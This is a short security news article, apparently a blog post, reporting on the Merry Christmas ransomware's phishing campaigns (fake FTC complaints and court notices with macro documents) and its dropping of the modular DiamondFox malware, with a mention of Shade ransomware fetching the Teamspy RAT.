The “Merry Christmas” ransomware, also known as Merry X-Mas, are also dropping the DiamondFox malware on infected computers.
This method is used by the ransomware’s operators to collect data from infected hosts, such as passwords, sensitive files, and others.
It is quite surprising that multiple security researchers detected the Merry Christmas ransomware in the first week of 2017.
Security researchers from Bleeping Computer ran an article detailing the modus operandi of the first ransomware variants on January 4, 2017.
It turned out to be that their initial wave of attack was through spammed emails posing as FTC consumer complaints which had malicious documents via emails.
Multiple pushes or waves of attacks have been orchestrated since and newer infection are still being detected.
People would think that the ransomware was just intended for the Christmas season and security experts expected it to end soon.
It seems that they were wrong. A few days after the initial wave of Merry Christmas ransomware infections, they have detected a second wave surge of attacks.
Clever enough, they used different ransom notes and spam keywords to lure victims. This time they even used the emails posing as court attendance notices.
Nothing changed except the way they trick people into opening them. These emails included links that downloaded a file from an online server, which contained macro scripts, and which if allowed to execute would download and install the latest version of the Merry Christmas ransomware.
A few hours after Bleeping Computer published their findings, security researcher MalwareHunterTeam discovered that recent Merry Christmas ransomware versions would also unpack and drop the DiamondFox malware.
DiamondFox is a modular malware family that’s currently sold on various Dark Web malware marketplaces, such as AlphaBay and Hansa.
This malware includes components for transforming infected PCs into DDoS bots, components for stealing credit card data from PoS systems, components for ransacking browser passwords, components for opening RDP (remote desktop) connections, and many other more.
The Merry Christmas family is not the first ransomware threat to add secondary malware payloads to its normal attack routine. In the summer of 2016, security researchers from Kaspersky discovered versions of the Shade (Troldesh) ransomware that downloaded the Teamspy RAT in order to determine and evaluate the type of computer they infected, and decide if to charge a higher sum to unlock files.
Below are a a screenshots of the infected screens: